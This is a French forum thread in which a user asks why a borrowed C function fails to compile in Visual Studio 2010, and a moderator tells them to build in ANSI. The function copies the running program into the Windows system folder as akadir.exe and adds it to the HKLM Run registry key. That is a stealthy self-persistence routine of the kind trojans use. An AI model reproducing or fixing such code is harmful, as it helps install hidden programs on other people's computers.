Problème de compilation avec visual studio 2010.

Résolu
shinji63 Messages postés 12 Date d'inscription dimanche 21 mai 2006 Statut Membre Dernière intervention 10 septembre 2011 - 1 mars 2011 à 15:55
shinji63 Messages postés 12 Date d'inscription dimanche 21 mai 2006 Statut Membre Dernière intervention 10 septembre 2011 - 1 mars 2011 à 16:08
void bdr()
{
HKEY key; //nom de la clef
char windobedir[81]; //chemin du soft
char *progdir;

GetWindowsDirectory(windobedir,50);//ou est le soft ?
progdir = GetCommandLine();
strcat(windobedir,"\\system\\akadir.exe");
if(strcmp(progdir,windobedir) != 0)
CopyFile(progdir,windobedir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&key);
RegSetValueEx(key,"[Belou]",0,REG_SZ,(LPBYTE) windobedir,strlen(windobedir));
RegCloseKey(key);
}


J'ai prit se bout de code sur se site, or quand je veux compiler avec visual studio 2010, j’obtiens : error C2664: 'RegSetValueExW' : impossible de convertir le paramètre 2 de 'const char [8]' en 'LPCWSTR'
Si quelqu'un peut m'expliquer comment régler se problème sa serait super !
Cdlt.

2 réponses

BruNews Messages postés 21040 Date d'inscription jeudi 23 janvier 2003 Statut Modérateur Dernière intervention 21 août 2019
1 mars 2011 à 16:01
Compile en ANSI au lieu de UNICODE.

AUTRE CHOSE:
char windobedir[81];
horreur, merci le compilo pour l'alignement...
Ici c'est codedobedir.

ciao...
BruNews, MVP VC++
3
shinji63 Messages postés 12 Date d'inscription dimanche 21 mai 2006 Statut Membre Dernière intervention 10 septembre 2011
1 mars 2011 à 16:08
ah ba merci beaucoup sa va beaucoup mieux déjà ^^
0
Rejoignez-nous